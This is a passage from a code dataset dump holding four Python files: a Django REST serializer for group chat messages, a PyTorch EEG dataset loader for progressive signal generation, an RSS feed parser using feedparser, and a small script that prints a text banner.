group_message(self, groupchat):\n _groupchat = GroupChat.objects.get(id=groupchat.id)\n messages = []\n for message in _groupchat.messages.all():\n messages.append(message.message)\n return messages\n\n\nclass GroupMessageSerializer(serializers.ModelSerializer):\n class Meta:\n model = GroupMessage\n fields = ['author', 'author_name', 'author_url', 'message', 'created', 'updated', 'group_chat']\n\n author_name = serializers.SerializerMethodField('author_name_field')\n author_url = serializers.SerializerMethodField('author_url_field')\n\n def author_name_field(self, groupmessage):\n return groupmessage.author.full_name\n\n def author_url_field(self, groupmessage):\n return groupmessage.author.profile.url\n\n","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"369507027","text":"import os\nimport glob\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\nfrom scipy.io import loadmat\nfrom torch.utils.data import Dataset\nfrom torch.utils.data._utils.collate import default_collate\n\nfrom utils import load_pkl, save_pkl, resample_signal, cudize, random_latents\n\nDATASET_VERSION = 7\n\n'''\n!pip install imageio\n!pip install gdown\n#val=0, stride=1(1.5), num_channels=17, start=1\n!gdown --id 1Lp5e9vHPeFaVyccT48H0wbGSblrC81Gu\n!gdown --id 17QIjg0lkvedcmmpo1YP79OeTpt7TuYNI\n'''\n\n\n# our channels are CHNL = { 'F3', 'F4', 'O1', 'O2', 'CZ' }\n# for super res, get F3, O1, CZ and generate F4 and O2\n# bio_sampling_freq: 1 -> 4 -> 8 -> 16 -> 24 -> 32 -> 40 -> 60\nclass EEGDataset(Dataset):\n # for 60(sampling), starting from 1 hz(sampling) [32 samples at the beginning]\n progression_scale_up = [4, 2, 2, 3, 4, 5, 3]\n progression_scale_down = [1, 1, 1, 2, 3, 4, 2]\n\n # for 60(sampling), starting from 0.25 hz(sampling) [8 samples at the beginning] (also set start_depth)\n # progression_scale_up = [2, 2] + progression_scale_up\n # progression_scale_down = [1, 1] + progression_scale_down\n\n picked_channels = [3, 5, 9, 15, 16]\n\n def __init__(self, given_data, dir_path='./data/prepared_eegs_mat_th5/', data_sampling_freq=220,\n start_sampling_freq=1, end_sampling_freq=60, start_seq_len=32, num_channels=17, return_long=False):\n super().__init__()\n self.model_depth = len(self.progression_scale_up)\n self.alpha = 1.0\n self.dir_path = dir_path\n self.end_sampling_freq = end_sampling_freq\n seq_len = start_seq_len * end_sampling_freq / start_sampling_freq * 1.5\n assert seq_len == int(seq_len), 'seq_len must be an int'\n seq_len = int(seq_len)\n self.seq_len = seq_len\n self.initial_kernel_size = start_seq_len\n self.stride = seq_len\n self.max_dataset_depth = len(self.progression_scale_up)\n self.num_channels = num_channels if self.picked_channels is None else len(self.picked_channels)\n self.return_long = return_long\n if given_data is not None:\n self.seq_len = int(start_seq_len * end_sampling_freq / start_sampling_freq)\n self.data_pointers = given_data[0]\n self.datas = given_data[1]\n return\n all_files = glob.glob(os.path.join(dir_path, '*_1.txt'))\n is_matlab = len(all_files) == 0\n if is_matlab:\n all_files = glob.glob(os.path.join(dir_path, '*.mat'))\n files = [i for i in range(len(all_files))]\n sizes = []\n num_points = []\n self.datas = []\n for i in tqdm(files):\n is_ok = True\n if is_matlab:\n try:\n tmp = loadmat(all_files[i])['eeg_signal']\n tmp = resample_signal(tmp, data_sampling_freq, end_sampling_freq, False)\n size = 
int(np.ceil((tmp.shape[1] - seq_len + 1) / self.stride))\n except Exception:\n size = 0\n if size <= 0:\n is_ok = False\n else:\n sizes.append(size)\n num_points.append((sizes[-1] - 1) * self.stride + seq_len)\n if self.picked_channels is None:\n self.datas.append(tmp[:num_channels, :num_points[-1]])\n else:\n self.datas.append(tmp[self.picked_channels, :num_points[-1]])\n else:\n for_range = range(num_channels) if self.picked_channels is None else self.picked_channels\n for kk, j in enumerate(for_range):\n with open('{}_{}.txt'.format(all_files[i][:-6], j + 1)) as f:\n tmp = list(map(float, f.read().split()))\n tmp = np.array(tmp, dtype=np.float32)\n tmp = resample_signal(tmp, data_sampling_freq, end_sampling_freq, False)\n if kk == 0:\n size = int(np.ceil((len(tmp) - seq_len + 1) / self.stride))\n if size <= 0:\n is_ok = False\n break\n sizes.append(size)\n num_points.append((sizes[-1] - 1) * self.stride + seq_len)\n self.datas.append(np.zeros((num_channels, num_points[-1]), dtype=np.float32))\n tmp = tmp[:num_points[-1]]\n self.datas[-1][j, :] = tmp\n if is_ok:\n self.datas[-1], is_ok = self.normalize(self.datas[-1])\n if not is_ok:\n del sizes[-1]\n del num_points[-1]\n del self.datas[-1]\n self.data_pointers = [(i, j) for i, s in enumerate(sizes) for j in range(s)]\n\n @classmethod\n def from_config(cls, validation_ratio, validation_seed, dir_path, data_sampling_freq,\n start_sampling_freq, end_sampling_freq, start_seq_len, num_channels, return_long):\n assert end_sampling_freq <= data_sampling_freq\n target_location = os.path.join(dir_path, '{}c_{}v_{}ss_{}es_{}l.npz'.format(num_channels, DATASET_VERSION,\n start_sampling_freq,\n end_sampling_freq, start_seq_len))\n if os.path.exists(target_location):\n print('loading dataset from file: {}'.format(target_location))\n given_data = np.load(target_location)\n given_data = [load_pkl(target_location + '.pkl'), [given_data['arr_{}'.format(i)]\n for i in range(len(given_data.keys()))]]\n else:\n print('creating dataset from scratch')\n dataset = cls(None, dir_path, data_sampling_freq, start_sampling_freq,\n end_sampling_freq, start_seq_len, num_channels, return_long)\n np.savez_compressed(target_location, *dataset.datas)\n save_pkl(target_location + '.pkl', dataset.data_pointers)\n given_data = [dataset.data_pointers, dataset.datas]\n return_datasets = []\n for i in range(2):\n return_datasets.append(cls(given_data, dir_path, data_sampling_freq, start_sampling_freq,\n end_sampling_freq, start_seq_len, num_channels, return_long))\n data_pointers = [x for x in return_datasets[0].data_pointers]\n np.random.seed(validation_seed)\n np.random.shuffle(data_pointers)\n return_datasets[0].data_pointers = data_pointers[:int((1 - validation_ratio) * len(data_pointers))]\n return_datasets[1].data_pointers = data_pointers[int((1 - validation_ratio) * len(data_pointers)):]\n return return_datasets[0], return_datasets[1]\n\n @staticmethod\n def normalize(arr):\n arr_max = arr.max()\n arr_min = arr.min()\n is_ok = arr_max != arr_min\n return ((arr - arr_min) / ((arr_max - arr_min) if is_ok else 1.0)) * 2.0 - 1.0, is_ok\n\n @property\n def shape(self):\n return len(self), self.num_channels, self.seq_len\n\n def __len__(self):\n return len(self.data_pointers)\n\n def load_file(self, item):\n i, k = self.data_pointers[item]\n if self.return_long:\n return self.datas[i][:, k * self.stride:(k + 1) * self.stride]\n else:\n rand_shift = np.random.randint(self.stride - self.seq_len)\n return self.datas[i][:, k * self.stride + rand_shift:k * self.stride + rand_shift + 
self.seq_len]\n\n def resample_data(self, data, index, forward=True, alpha_fade=False):\n up_scale = self.progression_scale_up[index - (1 if alpha_fade else 0)]\n down_scale = self.progression_scale_down[index - (1 if alpha_fade else 0)]\n if forward:\n return resample_signal(data, down_scale, up_scale, True)\n return resample_signal(data, up_scale, down_scale, True)\n\n def __getitem__(self, item):\n with torch.no_grad():\n datapoint = torch.from_numpy(self.load_file(item).astype(np.float32)).unsqueeze(0)\n target_depth = self.model_depth\n if self.max_dataset_depth != target_depth:\n datapoint = self.create_datapoint_from_depth(datapoint, target_depth)\n return {'x': self.alpha_fade(datapoint).squeeze(0)}\n\n def create_datapoint_from_depth(self, datapoint, target_depth):\n depth_diff = (self.max_dataset_depth - target_depth)\n for index in reversed(list(range(len(self.progression_scale_up)))[-depth_diff:]):\n datapoint = self.resample_data(datapoint, index, False)\n return datapoint\n\n def alpha_fade(self, datapoint):\n if self.alpha == 1:\n return datapoint\n t = self.resample_data(datapoint, self.model_depth, False, alpha_fade=True)\n t = self.resample_data(t, self.model_depth, True, alpha_fade=True)\n return datapoint + (t - datapoint) * (1 - self.alpha)\n\n\ndef get_collate_real(max_sampling_freq, max_len):\n def collate_real(batch):\n return cudize(default_collate(batch))\n\n return collate_real\n\n\ndef get_collate_fake(latent_size, z_distribution, collate_real):\n def collate_fake(batch):\n batch = collate_real(batch) # extract condition(features)\n batch['z'] = random_latents(batch['x'].size(0), latent_size, z_distribution)\n return batch\n\n return collate_fake\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":9545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"81317671","text":"import sys\nimport urllib\nimport logging\nfrom datetime import datetime\n\nfrom py.ext import feedparser\n\nfrom py.common.utils import *\n\n\ndef GetAndParse(feed, debug, feedDataSettings):\n a1 = datetime.now()\n feed = urllib.unquote_plus(feed) # because of encodeURIComponent\n if feedDataSettings is None:\n feedDataSettings = GetFeedDataSettings(feed)\n someDataWasAdded = False\n\n if (feedDataSettings is None):\n logging.debug('GetAndParse => feedDataSettings is None: %s', feed)\n\n etag = getattr(feedDataSettings, 'new_etag', None)\n modified = getattr(feedDataSettings, 'new_modified', None)\n\n a = datetime.now()\n d = feedparser.parse(feed, etag=etag, modified=modified)\n b = datetime.now()\n c = b - a\n logging.debug('parse (%s) entries for %s', len(d['entries']), feed)\n logging.debug('parsing took %s seconds', c.seconds)\n\n items = []\n itemSize = sys.getsizeof(feedDataSettings.private_data)\n\n entriesCount = 0\n\n for e in d['entries']:\n di = {}\n\n di['link'] = getattr(e, 'link', 'THIS_WILL_HUNT_ME')\n # use hashlib.hexdigest?\n di['id'] = str(hash(getattr(e, 'id', di['link'])))\n\n httpId = di['link']\n if httpId.startswith('https'):\n httpId = httpId.replace('https', 'http', 1)\n\n # compare by id and by http link (some feeds keep generating\n # random(?!?) 
http or https prefix thus the normalization)\n if feedDataSettings.latest_item_id == di['id']:\n if len(items) > 0:\n AddSomeData(d, feed, items, feedDataSettings, False)\n items = []\n someDataWasAdded = True\n\n break\n\n if feedDataSettings.latest_http_link == httpId:\n if len(items) > 0:\n AddSomeData(d, feed, items, feedDataSettings, False)\n items = []\n someDataWasAdded = True\n\n break\n\n di['title'] = getattr(e, 'title', '')\n di['author'] = getattr(e, 'author', '')\n\n try:\n di['published'] = e.published\n except Exception:\n di['published'] = GetCurrentDateTime()\n\n try:\n if hasattr(e, 'content'):\n if len(e.content) > 0:\n headline_content = ''\n lEntries = len(e.content)\n for eCount in range(0, lEntries):\n headline_content = headline_content + \\\n e.content[eCount].value\n di['content'] = headline_content\n else:\n di['content'] = e.description\n except Exception:\n di['content'] = ''\n\n if hasattr(d, 'feed'):\n if hasattr(d['feed'], 'title'):\n di['feedTitle'] = d['feed']['title']\n\n ##feedDataSettings.article_count = feedDataSettings.article_count + 1\n\n itemSize = itemSize + sys.getsizeof(di)\n if itemSize < 80000: # todo more precise calcs here\n items.append(di)\n else:\n AddSomeData(d, feed, items, feedDataSettings, True)\n itemSize = 0\n items = []\n someDataWasAdded = True\n\n entriesCount = entriesCount + 1\n if entriesCount > 100:\n # well, just stop\n break\n\n if len(items) > 0:\n AddSomeData(d, feed, items, feedDataSettings, False)\n someDataWasAdded = True\n\n b1 = datetime.now()\n c1 = b1 - a1\n logging.debug('GetAndParse took %s seconds', c1.seconds)\n\n # if not someDataWasAdded:\n # self.calcNextUpdateInterval(False)\n","sub_path":"src/py/common/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"476735150","text":"line1 = \"hello tarena!\"\nline2 = \"my name is weimingze\"\nline3 = \"good-bye\"\nspace = ' '\nspace1 = len(line2) - len(line1)\nspace11 = space1 // 2 + 1\nspace12 = space1 - space11 + 2\nspace2 = 1\nspace3 = len(line2) - len(line3)\nspace31 = space3 // 2 + 1\nspace32 = space3 - space31 + 2\nheng1 = len(line2) + 2\nprint(\"+\" + \"-\" * heng1 + \"+\")\nprint(\"|\" + space * heng1 + \"|\")\nprint(\"|\" + space * space11 + line1 + space * space12 + \"|\")\nprint(\"|\" + space * space2 + line2 + space * space2 + \"|\")\nprint(\"|\" + space * space31 + line3 + space * space32 + \"|\")\nprint(\"|\" + space * heng1 + \"|\")\nprint(\"+\" + \"-\" * heng1 + \"+\")\n","sub_path":"text3.py","file_name":"text3.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}